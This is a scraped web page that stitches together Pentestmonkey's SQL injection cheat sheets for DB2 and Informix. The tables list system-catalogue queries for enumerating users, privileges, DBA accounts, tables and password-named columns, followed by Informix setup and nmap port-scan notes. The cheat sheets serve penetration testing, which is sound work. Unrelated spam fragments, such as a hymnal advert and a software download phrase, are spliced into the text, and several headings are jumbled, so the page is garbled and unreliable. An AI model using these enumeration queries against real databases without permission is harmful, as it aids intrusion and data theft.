PentestMonkey’s Ingres SQL Injection Cheat Sheet; Pentestmonkey’s DB2 SQL Injection Cheat Sheet; Pentestmonkey’s Informix SQL Injection Cheat Sheet; SQLite3 Injection Cheat sheet; Ruby on Rails (Active Record) SQL Injection Guide; ForkBombers SQLMap Tamper Scripts Update; SQLi in INSERT worse than SELECT; Manual SQL Injection Tips; Second. However if contrib/dblinkis installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights): SELECT. FROM dblink ('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version ') RETURNS (result TEXT); Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. 'ping pentestmonkey.
Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared…
Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
Postgresql Sql Injection Cheat Sheet
The complete list of SQL Injection Cheat Sheets I’m working is:
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.
| Version | select versionnumber, version_timestamp from sysibm.sysversions; |
| Comments | select blah from foo; — comment like this |
| Current User | select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1; select system_user from sysibm.sysdummy1; |
| List Users | N/A (I think DB2 uses OS-level user accounts for authentication.)Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; |
| List Password Hashes | N/A (I think DB2 uses OS-level user accounts for authentication.) |
| List Privileges | select * from syscat.tabauth; — privs on tables select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies |
| List DBA Accounts | select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’ |
| Current Database | select current server from sysibm.sysdummy1; |
| List Databases | SELECT schemaname FROM syscat.schemata; |
| List Columns | select name, tbname, coltype from sysibm.syscolumns; |
| List Tables | select name from sysibm.systables; |
| Find Tables From Column Name | select tbname from sysibm.syscolumns where name=’username’ |
| Select Nth Row | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
| Select Nth Char | SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b |
| Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
| ASCII Value -> Char | select chr(65) from sysibm.sysdummy1; — returns ‘A’ |
| Char -> ASCII Value | select ascii(‘A’) from sysibm.sysdummy1; — returns 65 |
| Casting | SELECT cast(’123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
| String Concatenation | SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’ |
| If Statement | TODO |
| Case Statement | TODO |
| Avoiding Quotes | TODO |
| Time Delay | ???See Heavy Queries article for some ideas. |
| Make DNS Requests | TODO |
| Command Execution | TODO |
| Local File Access | TODO |
| Hostname, IP Address | TODO |
| Location of DB files | TODO |
| Default/System Databases | TODO |
This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.
Thanks
Pentestmonkey gratefully acknowledges the contributions of:
r22mvk
Adrián for figuring out lots of the TODO items above:
http://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/
Tags: cheatsheet, database, db2, pentest, sqlinjection
Posted in SQL Injection
Some useful syntax reminders for SQL Injection into Informix databases…
Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Tn5250.
| Version | SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix |
| Comments | select 1 FROM systables WHERE tabid = 1; — comment |
| Current User | SELECT USER FROM systables WHERE tabid = 1; select CURRENT_ROLE FROM systables WHERE tabid = 1; |
| List Users | select username, usertype, password from sysusers; |
| List Password Hashes | TODO |
| List Privileges | select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; — which tables are accessible by which users select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; — which procedures are accessible by which users |
| List DBA Accounts | TODO |
| Current Database | SELECT DBSERVERNAME FROM systables where tabid = 1; — server name |
| List Databases | select name, owner from sysdatabases; |
| List Columns | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; |
| List Tables | select tabname, owner FROM systables; select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; |
| List Stored Procedures | select procname, owner FROM sysprocedures; |
| Find Tables From Column Name | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like ‘%pass%’; |
| Select Nth Row | select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; — selects the 10th row |
| Select Nth Char | SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’ |
| Bitwise AND | select bitand(6, 1) from systables where tabid = 1; — returns 0 select bitand(6, 2) from systables where tabid = 1; — returns 2 |
| ASCII Value -> Char | TODO |
| Char -> ASCII Value | select ascii(‘A’) from systables where tabid = 1; |
| Casting | select cast(’123′ as integer) from systables where tabid = 1; select cast(1 as char) from systables where tabid = 1; |
| String Concatenation | SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’ SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’ |
| String Length | SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables; |
| If Statement | TODO |
| Case Statement | select tabid, case when tabid>10 then “High” else ‘Low’ end from systables; |
| Avoiding Quotes | TODO |
| Time Delay | TODO |
| Make DNS Requests | TODO |
| Command Execution | TODO |
| Local File Access | TODO |
| Hostname, IP Address | SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname |
| Location of DB files | TODO |
| Default/System Databases | These are the system databases: sysmaster sysadmin* sysuser* sysutils* |
Oracle Sql Injection Cheat Sheet Pentestmonkey
* = don’t seem to contain anything / don’t allow readingInstalling Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon: English hymnal (uk, 1933)music for your church services.
- Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
- Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.
The following were set on my test system. This may help if you get command line access, but can’t get a GUI – you’ll need to change “testservername”:
My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix:
Pentestmonkey Sql Injection Cheat Sheet 2017
$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all
…
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
…
TODO How would we identify Informix listening on the network?
Mysql Injection Cheat Sheet
Rn programs in tulsa download free, software. Tags: cheatsheet, database, informix
Pentestmonkey Net
Posted in SQL Injection
Pentestmonkey Sqli Cheat Sheet